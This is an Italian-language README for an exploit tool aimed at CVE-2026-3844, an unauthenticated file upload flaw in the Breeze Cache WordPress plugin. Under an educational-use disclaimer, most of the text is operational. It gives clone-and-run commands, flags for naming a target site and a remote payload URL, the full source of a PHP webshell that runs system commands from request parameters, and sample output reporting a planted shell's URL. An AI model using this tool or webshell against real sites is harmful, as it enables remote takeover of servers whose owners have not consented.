
WordPress - Breeze Cache <= 2.4.4 - Caricamento Arbitrario di File Non Autenticato
QUESTO STRUMENTO È FORNITO SOLO PER SCOPI EDUCATIVI E DI RICERCA SULLA SICUREZZA.
L'accesso non autorizzato a sistemi informatici è illegale. Utilizza questo strumento solo su
sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare. L'autore non si
assume alcuna responsabilità per usi impropri o danni causati da questo software.
CVE-2026-3844 è una vulnerabilità critica di caricamento arbitrario di file non autenticato nel plugin Breeze Cache per WordPress (versioni ≤ 2.4.4). Il plugin non riesce a validare correttamente il parametro srcset nei commenti, consentendo ad attaccanti remoti di caricare file dannosi (inclusi webshell) sul server.
La vulnerabilità sfrutta la funzionalità di caching Gravatar in Breeze. Quando viene pubblicato un commento con un parametro srcset appositamente modificato contenente un URL di file remoto, Breeze scarica e memorizza il file localmente in:
/wp-content/cache/breeze-extra/gravatars/[marcatore_casuale][estensione_file]
Prerequisito: L'opzione "Host Files Locally - Gravatars" deve essere abilitata nelle impostazioni di Breeze.
# Clona il repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# Installa le dipendenze
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# Verifica se il target è vulnerabile senza sfruttamento
python3 CVE-2026-3844.py -u http://target.com --check-only
# Utilizza un URL payload personalizzato
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# Salva l'output in un file
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# Aumenta il timeout per target lenti
python3 CVE-2026-3844.py -u http://target.com --timeout 30
| Argomento | Descrizione |
|---|---|
-u, --url | URL del target (obbligatorio) |
-p, --payload | URL del payload remoto |
--timeout | Timeout della richiesta in secondi (predefinito: 15) |
--check-only | Verifica solo se il target è vulnerabile |
-o, --output | Salva l'URL della shell in un file |
Crea il tuo webshell (shell.php):
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
Ospitalo in un luogo accessibile, poi utilizza:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
L'exploit controlla automaticamente la stringa di verifica 4356452d323032362d33383434 (codifica esadecimale di "CVE-2026-3844") nel file caricato per confermare lo sfruttamento riuscito.
[*] FASE 1: VALUTAZIONE DELLA VULNERABILITÀ
[*] Verifica della versione del plugin Breeze...
[+] Target VULNERABILE (Breeze v2.4.4)
[*] FASE 2: SFRUTTAMENTO
[!] REQUISITO: 'Host Files Locally - Gravatars' DEVE ESSERE ABILITATO
[*] Passo 1: Invio del commento dannoso...
[+] Commento pubblicato con successo
[*] Passo 2: Attesa che Breeze memorizzi il file nella cache...
[*] Passo 3: Verifica del file caricato...
[+] File trovato in: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] STRINGA DI VERIFICA TROVATA - SFRUTTAMENTO RIUSCITO!
[✓] STATO: SUCCESSO
[✓] URL WEBSHELL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # Script exploit principale
├── README.md # Questo file
└── LICENSE # Licenza MIT
Questo progetto è concesso in licenza sotto la Licenza MIT - consulta il file LICENSE per i dettagli.
Se trovi utile questo strumento, per favore lascia una stella ⭐ su GitHub!